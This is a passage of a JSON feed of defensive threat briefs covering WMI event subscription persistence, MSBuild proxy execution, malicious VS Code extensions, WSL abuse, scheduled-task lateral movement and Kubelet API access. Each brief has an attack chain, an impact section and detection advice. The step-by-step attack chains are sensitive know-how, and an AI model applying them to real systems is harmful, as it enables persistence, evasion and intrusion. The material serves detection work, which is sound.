id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging this technique can allow adversaries to maintain persistent access to a compromised system. This can lead to long-term data exfiltration, lateral movement within the network, and deployment of ransomware. The low severity score assigned to the original rule may underestimate the potential impact, as persistence is a critical component of many advanced attacks. Affected systems may require extensive remediation to remove all traces of the malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Office Application Loading Task Scheduler DLL\u0026rdquo; to your SIEM and tune for your environment to detect this specific activity.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 7 (Image Loaded) logging on Windows endpoints to provide visibility into DLL loading events, which is a prerequisite for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the specific scheduled tasks that are created and the payloads they execute.\u003c/li\u003e\n\u003cli\u003eMonitor for scheduled task creation events (Event ID 4698) and deletion events (Event ID 4699) in the Windows Event Logs, as referenced in the rule\u0026rsquo;s investigation guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-suspicious-image-load-office/","summary":"Detection of taskschd.dll image loads from Microsoft Office applications indicates potential COM-based scheduled task creation for persistence, bypassing traditional schtasks.exe usage.","title":"Suspicious Image Load (taskschd.dll) from MS Office","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-image-load-office/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic 
Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["low"],"_cs_tags":["defense-evasion","execution","credential-access","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Subsystem for Linux (WSL) enables users to run Linux binaries natively on Windows, creating an opportunity for adversaries to evade detection by executing malicious Linux commands without triggering traditional Windows security alerts. This technique involves leveraging WSL\u0026rsquo;s bash shell to perform actions that might otherwise be flagged if executed directly within the Windows environment. This alert focuses on detecting suspicious behaviors indicative of malicious use of WSL, such as unauthorized access to sensitive files, use of network tools, or unusual command-line arguments. This can be used to facilitate lateral movement, data exfiltration, or other malicious activities. The Qualys blog post \u0026ldquo;Implications of Windows Subsystem for Linux for Adversaries \u0026amp; Defenders\u0026rdquo; (2022-03-22) describes this attack vector in detail.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker enables WSL if it is not already enabled.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ewsl.exe\u003c/code\u003e to start a Linux environment.\u003c/li\u003e\n\u003cli\u003eInside the WSL environment, the attacker uses \u003ccode\u003ebash\u003c/code\u003e to execute malicious commands.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to access sensitive files such as \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e to gather credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses network tools like \u003ccode\u003ecurl\u003c/code\u003e to download or upload 
malicious payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker executes scripts to establish persistence within the WSL environment.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised WSL environment to move laterally to other systems or exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation via WSL can lead to a variety of negative outcomes, including unauthorized access to sensitive information, credential compromise, and lateral movement within the network. While specific victim counts are unavailable, this technique can significantly increase the attack surface and reduce the effectiveness of traditional Windows-based security measures, affecting organizations across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture \u003ccode\u003ewsl.exe\u003c/code\u003e and \u003ccode\u003ebash.exe\u003c/code\u003e executions (reference: Sysmon Event ID 1 setup in rule setup section).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious WSL Activity\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process command lines for suspicious arguments used with \u003ccode\u003ewsl.exe\u003c/code\u003e, such as access to \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e (reference: Sigma rule selection criteria).\u003c/li\u003e\n\u003cli\u003eInvestigate and whitelist legitimate uses of WSL within your environment to reduce false positives (reference: False positive analysis in the rule description).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wsl-bash-exec/","summary":"Adversaries may leverage the Windows Subsystem for Linux (WSL) to execute malicious Linux 
commands, bypassing traditional Windows security measures, detected by monitoring process execution and command-line arguments.","title":"Suspicious Execution via Windows Subsystem for Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-wsl-bash-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["VS Code"],"_cs_severities":["medium"],"_cs_tags":["initial-access","execution","supply-chain-compromise","vscode"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eA malicious VS Code extension, configured to run upon editor startup, can execute arbitrary commands, potentially leading to the installation of remote access trojans (RATs) or other malicious payloads. The attack vector leverages the extension host under \u003ccode\u003e.vscode/extensions/\u003c/code\u003e to spawn processes such as script interpreters or download utilities. This activity has been observed in campaigns like the fake Clawdbot extension that installed ScreenConnect RAT. 
The execution can involve Living-off-the-Land binaries (LOLBins) or recently created executables from non-standard paths, posing a significant risk to Windows systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user installs a malicious VS Code extension.\u003c/li\u003e\n\u003cli\u003eThe extension is configured with \u003ccode\u003eactivationEvents: [\u0026quot;onStartupFinished\u0026quot;]\u003c/code\u003e to run automatically when VS Code starts.\u003c/li\u003e\n\u003cli\u003eThe VS Code extension host (\u003ccode\u003eCode.exe\u003c/code\u003e or \u003ccode\u003enode.exe\u003c/code\u003e) spawns a script interpreter (e.g., \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e) from within the \u003ccode\u003e.vscode/extensions/\u003c/code\u003e directory.\u003c/li\u003e\n\u003cli\u003eThe script interpreter executes a command to download a malicious payload from a remote server using tools like \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003ebitsadmin.exe\u003c/code\u003e, or \u003ccode\u003emshta.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often in a temporary directory outside of Program Files.\u003c/li\u003e\n\u003cli\u003eThe script interpreter executes the downloaded payload, leading to further malicious activity. For example, ScreenConnect might be installed.\u003c/li\u003e\n\u003cli\u003ePersistence mechanisms are established (e.g., via registry keys or scheduled tasks).\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the complete compromise of a developer\u0026rsquo;s workstation, potentially affecting intellectual property and sensitive data. 
The installation of RATs like ScreenConnect can enable persistent remote access, allowing attackers to perform data exfiltration, lateral movement, and further malicious activities. The compromised machine can then be used as a pivot point to attack other systems within the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Suspicious Execution from VS Code Extension\u0026rdquo; Sigma rule to your SIEM to detect malicious process execution from VS Code extensions.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for script interpreters and LOLBins spawned from the \u003ccode\u003e.vscode/extensions/\u003c/code\u003e directory.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit installed VS Code extensions for suspicious activity or unnecessary permissions.\u003c/li\u003e\n\u003cli\u003eEducate developers about the risks of installing extensions from untrusted sources.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domains associated with ScreenConnect and other RATs at the firewall/DNS resolver.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-vscode-extension-execution/","summary":"Malicious VS Code extensions can execute arbitrary commands, leading to initial access and subsequent payload deployment on Windows systems.","title":"Suspicious Execution from VS Code Extension","url":"https://feed.craftedsignal.io/briefs/2024-01-vscode-extension-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk 
Cloud"],"_cs_severities":["medium"],"_cs_tags":["schtasks","scheduled-task","persistence","execution"],"_cs_type":"advisory","_cs_vendors":["Splunk"],"content_html":"\u003cp\u003eThis analytic detects the execution of Windows Scheduled Tasks on demand using the \u003ccode\u003eschtasks.exe\u003c/code\u003e utility. The detection focuses on identifying \u003ccode\u003eschtasks.exe\u003c/code\u003e being executed with the \u003ccode\u003erun\u003c/code\u003e command, which is often used by adversaries to force the execution of previously created scheduled tasks. This activity is significant because attackers frequently leverage scheduled tasks for persistent access, privilege escalation, or lateral movement within a compromised network. Detecting this behavior can help defenders identify and respond to malicious activity before it leads to further compromise. The technique has been associated with various threat actors and malware families including Qakbot, XMRig, and Medusa Ransomware as well as campaigns such as CISA AA22-257A and Industroyer2.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through various means (e.g., exploiting a vulnerability, phishing).\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence by creating a new scheduled task using \u003ccode\u003eschtasks.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003eschtasks.exe\u003c/code\u003e with the \u003ccode\u003erun\u003c/code\u003e command to trigger the malicious scheduled task on demand.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes a malicious payload, such as a script or executable.\u003c/li\u003e\n\u003cli\u003eThe payload may perform various malicious actions, such as downloading additional malware, escalating privileges, or gathering sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other 
systems on the network by creating and running scheduled tasks remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to disable security controls or evade detection by modifying existing scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or system disruption.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to persistent access, lateral movement, and privilege escalation within the compromised environment. Attackers can use this technique to maintain a foothold on the system, spread malware to other systems on the network, and ultimately achieve their objectives, such as data theft, ransomware deployment, or disruption of critical services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect the execution of \u003ccode\u003eschtasks.exe\u003c/code\u003e with the \u003ccode\u003erun\u003c/code\u003e command, tuning it to exclude known legitimate uses.\u003c/li\u003e\n\u003cli\u003eInvestigate any detected instances of \u003ccode\u003eschtasks.exe\u003c/code\u003e execution with the \u003ccode\u003erun\u003c/code\u003e command to determine if they are malicious.\u003c/li\u003e\n\u003cli\u003eMonitor process execution data for unusual or unexpected processes being launched by scheduled tasks.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and regularly review and audit scheduled tasks to prevent unauthorized modifications or creations.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging (Event ID 1) to capture detailed information about process executions, including command-line 
arguments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-schtasks-on-demand/","summary":"Detection of on-demand execution of Windows Scheduled Tasks via the schtasks.exe command-line utility, a common technique for persistence and lateral movement.","title":"Schtasks Run Task On Demand","url":"https://feed.craftedsignal.io/briefs/2024-01-03-schtasks-on-demand/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the creation of scheduled tasks on Windows systems originating from a remote source using Remote Procedure Call (RPC). The creation of scheduled tasks is a common technique used for persistence and execution. While administrators may legitimately use this functionality for remote management, adversaries also leverage it for lateral movement and executing malicious code on compromised systems. The rule specifically looks for RPC calls where the client locality and process ID are 0, suggesting the task was created remotely. Identifying this activity allows defenders to investigate potentially malicious lateral movement and unauthorized task execution. This activity has been observed across various Windows environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a network, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target system within the network accessible via RPC.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes an RPC connection to the target system.\u003c/li\u003e\n\u003cli\u003eUsing the RPC connection, the attacker creates a new scheduled task on the target system. 
The RpcCallClientLocality and ClientProcessId are set to 0 in the task creation event, indicating remote origin.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload or command. This could involve running a script, executable, or PowerShell command.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is triggered based on a defined schedule or event.\u003c/li\u003e\n\u003cli\u003eThe malicious payload executes on the target system, achieving the attacker\u0026rsquo;s objective.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system to further pivot within the network, repeating the process on other targets.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the establishment of persistence on the target system, allowing the attacker to maintain access even after reboots or credential changes. This can also facilitate lateral movement, enabling the attacker to compromise additional systems within the network. The impact could range from data theft and system disruption to full network compromise. 
Organizations may experience downtime, data loss, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable \u0026ldquo;Audit Other Object Access Events\u0026rdquo; to generate the Windows Security Event Logs required for detection (reference: Setup section in content).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM to detect remote scheduled task creation events (reference: rules section).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to determine the legitimacy of the scheduled task creation.\u003c/li\u003e\n\u003cli\u003eReview and restrict permissions for creating scheduled tasks, especially from remote sources, to prevent unauthorized task creation.\u003c/li\u003e\n\u003cli\u003eMonitor the TaskContent value to investigate the configured action of scheduled tasks created remotely (reference: Triage and analysis section in content).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-remote-task-creation/","summary":"The creation of scheduled tasks from a remote source via RPC, where the RpcCallClientLocality and ClientProcessId are 0, indicates potential adversary lateral movement within a Windows environment.","title":"Remote Scheduled Task Creation via RPC","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-task-creation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defend for Containers"],"_cs_severities":["high"],"_cs_tags":["container","kubelet","kubernetes","lateral-movement","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis rule detects potential direct Kubelet access via process arguments within Linux containers. 
Attackers may target the Kubelet API to gain unauthorized access to the Kubernetes API server or other sensitive resources within the cluster. Observed requests are often used for reconnaissance, such as enumerating pods and cluster resources, or for executing commands directly on the API server. This activity indicates a potential attempt to move laterally within the Kubernetes environment. The activity is detected by monitoring process arguments for HTTP requests directed at the Kubelet API on ports 10250 or 10255. The detection leverages Elastic Defend for Containers, introduced in version 9.3.0.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a container within the Kubernetes cluster, potentially through exploiting a vulnerable application.\u003c/li\u003e\n\u003cli\u003eThe attacker opens an interactive shell within the compromised container.\u003c/li\u003e\n\u003cli\u003eUsing command-line tools such as \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e, the attacker crafts an HTTP request targeting the Kubelet API, typically on port 10250 or 10255.\u003c/li\u003e\n\u003cli\u003eThe HTTP request is embedded within the process arguments, including specific Kubelet endpoints such as \u003ccode\u003e/pods\u003c/code\u003e, \u003ccode\u003e/exec\u003c/code\u003e, \u003ccode\u003e/run\u003c/code\u003e, or \u003ccode\u003e/logs\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to enumerate pods and other cluster resources by querying the \u003ccode\u003e/pods\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute commands within containers by leveraging the \u003ccode\u003e/exec\u003c/code\u003e or \u003ccode\u003e/run\u003c/code\u003e endpoints.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to retrieve container logs using the \u003ccode\u003e/logs\u003c/code\u003e 
endpoint.\u003c/li\u003e\n\u003cli\u003eSuccessful exploitation allows the attacker to move laterally within the Kubernetes cluster, potentially gaining access to sensitive data or control over other resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of direct Kubelet access can lead to significant compromise within a Kubernetes cluster. Attackers can enumerate sensitive information, execute arbitrary commands within containers, and move laterally to other parts of the cluster. This can result in data exfiltration, denial of service, or complete cluster takeover. Due to the high level of access granted by Kubelet, a successful attack allows the attacker to take complete control over the target node.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM and tune them for your environment. Enable Elastic Defend for Containers with a minimum version of 9.3.0 to generate the necessary logs for these detections.\u003c/li\u003e\n\u003cli\u003eReview network policies to restrict pod access to Kubelet ports (10250, 10255) except from approved node-local agents (references: \u003ca href=\"https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster\"\u003ehttps://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eHarden Kubelet authentication and authorization by disabling anonymous access and requiring webhook authorization (references: \u003ca href=\"https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/\"\u003ehttps://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eEnforce pod security policies to restrict privileged pods and host networking, reducing the 
attack surface for node API access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-kubelet-access/","summary":"Detection of potential direct Kubelet access via process arguments in Linux containers, which could lead to enumeration, execution, or lateral movement within the Kubernetes cluster.","title":"Potential Direct Kubelet Access via Process Arguments","url":"https://feed.craftedsignal.io/briefs/2024-01-kubelet-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon","Elastic Defend","Elastic Endpoint Security","CrowdStrike Falcon","SentinelOne Cloud Funnel","Windows Security Event Logs","winlogbeat"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows","wmi"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne","Elastic"],"content_html":"\u003cp\u003eWindows Management Instrumentation (WMI) provides a powerful framework for managing Windows systems, but adversaries can abuse its capabilities to establish persistence. By creating WMI event subscriptions, attackers can execute arbitrary code in response to defined system events. This technique involves creating event filters, providers, consumers, and bindings that automatically run malicious code. This can be achieved through tools like \u003ccode\u003ewmic.exe\u003c/code\u003e, which allows the creation of event consumers such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e. Successful exploitation of WMI for persistence allows attackers to maintain unauthorized access to a compromised system, even after reboots or other system changes. 
This activity has been observed across various environments, highlighting the need for robust detection mechanisms to identify and prevent WMI-based persistence.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ewmic.exe\u003c/code\u003e to create a WMI event filter that defines a specific event to monitor.\u003c/li\u003e\n\u003cli\u003eA WMI event consumer, such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, is created using \u003ccode\u003ewmic.exe\u003c/code\u003e specifying the malicious code or script to execute when the event occurs.\u003c/li\u003e\n\u003cli\u003eA WMI binding is established between the event filter and the event consumer using \u003ccode\u003ewmic.exe\u003c/code\u003e, linking the event to the action.\u003c/li\u003e\n\u003cli\u003eThe malicious WMI event subscription is activated, monitoring for the defined event.\u003c/li\u003e\n\u003cli\u003eWhen the specified event occurs, the WMI service triggers the execution of the associated malicious code or script through the event consumer.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the system, as the WMI event subscription will re-activate after reboots.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform additional malicious activities, such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of WMI for persistence can allow an attacker to maintain long-term, unauthorized access to a compromised system. This can result in data theft, system compromise, and further malicious activities. 
While the exact number of victims is not specified in the source, the broad applicability of this technique means that many Windows systems are potentially at risk. If the attack succeeds, the attacker gains a foothold on the system that is difficult to detect and remove, which can lead to significant operational disruption and financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging and monitor for \u003ccode\u003ewmic.exe\u003c/code\u003e with command-line arguments related to creating event consumers, specifically \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, to trigger the Sigma rule \u0026ldquo;Detect Suspicious WMIC Process\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect suspicious WMI event subscription creation.\u003c/li\u003e\n\u003cli\u003eReview the investigation steps outlined in the provided documentation to triage and analyze potential WMI persistence attempts.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs and Sysmon for events related to WMI activity for broader coverage.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-persistence/","summary":"Adversaries can leverage Windows Management Instrumentation (WMI) to establish persistence by creating event subscriptions that trigger malicious code execution when specific events occur, using tools like wmic.exe to create event consumers.","title":"Persistence via WMI Event Subscription","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-persistence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud 
Funnel","CrowdStrike"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild","proxy-execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a legitimate tool used by developers to build applications. However, adversaries are known to abuse MSBuild to execute malicious code, leveraging its trusted status to bypass security measures. This technique allows attackers to perform various actions on compromised systems while blending in with legitimate system activity. The observed behavior involves MSBuild being started by system processes like Explorer (explorer.exe) or Windows Management Instrumentation (WMI, wmiprvse.exe). Defenders should be aware of this unusual activity as it signifies a potential defense evasion tactic and unauthorized code execution within the targeted environment. This activity has been observed across environments leveraging Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, CrowdStrike, and standard Windows event logging.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through various means (e.g., phishing, exploitation of vulnerabilities).\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a script or payload that invokes MSBuild.exe.\u003c/li\u003e\n\u003cli\u003eThe script or payload is executed by a system process like explorer.exe or wmiprvse.exe, which is highly unusual for typical MSBuild usage.\u003c/li\u003e\n\u003cli\u003eMSBuild.exe starts with specific command-line arguments that dictate the build process, often involving malicious code.\u003c/li\u003e\n\u003cli\u003eThe malicious code is embedded within an MSBuild project file (.csproj or similar).\u003c/li\u003e\n\u003cli\u003eMSBuild.exe executes the malicious code as part of the build 
process.\u003c/li\u003e\n\u003cli\u003eThe executed code performs actions such as downloading additional payloads, modifying system configurations, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as gaining remote access, exfiltrating data, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a variety of negative outcomes, including unauthorized code execution, system compromise, data theft, and potentially complete system takeover. The use of MSBuild as a proxy execution method allows attackers to evade traditional security controls and blend in with legitimate system activities. This can result in delayed detection and increased dwell time, amplifying the potential damage. Since MSBuild is a trusted Microsoft utility, its abuse can make malicious activity harder to identify and respond to.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Started by a System Process\u0026rdquo; to your SIEM to detect instances of MSBuild.exe being launched by explorer.exe or wmiprvse.exe (see rules section).\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the full context of MSBuild.exe executions (reference setup instructions in the source URL).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of MSBuild.exe started by explorer.exe or wmiprvse.exe to determine if they are legitimate or malicious.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring and logging for MSBuild.exe and related processes to detect similar activities in the future, ensuring alerts are configured for rapid response.\u003c/li\u003e\n\u003cli\u003eReview and whitelist any legitimate scripts or administrative tools that leverage MSBuild for authorized tasks to reduce 
false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-msbuild-system-process/","summary":"Adversaries are leveraging MSBuild, a Microsoft Build Engine, to execute malicious code by initiating it from system processes such as Explorer or WMI to evade defenses and execute unauthorized actions.","title":"MSBuild Started by System Process for Defense Evasion and Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-system-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild","masquerading"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may rename legitimate utilities, such as MSBuild, to evade detection, application allowlists, and other security protections. MSBuild, the Microsoft Build Engine, is a platform for building applications. Attackers can abuse MSBuild to proxy the execution of malicious code. The detection rule identifies instances where MSBuild is started after being renamed, indicating a potential attempt to evade detection. 
The rule focuses on identifying processes where the original file name is MSBuild.exe, but the process name is different, suggesting a renaming attempt.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker renames the legitimate MSBuild.exe executable to a different name (e.g., evil.exe) to evade detection.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the renamed MSBuild executable (evil.exe) with a malicious project file (.csproj or similar).\u003c/li\u003e\n\u003cli\u003eMSBuild processes the project file, which contains commands or scripts to be executed.\u003c/li\u003e\n\u003cli\u003eThe malicious commands within the project file are executed by MSBuild, potentially downloading or executing further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker may use MSBuild to execute PowerShell commands or other scripting languages for lateral movement or further exploitation.\u003c/li\u003e\n\u003cli\u003eMSBuild can be used to modify files, registry entries, or other system settings.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration or establishing persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers to install malware, steal sensitive information, or compromise the entire system. 
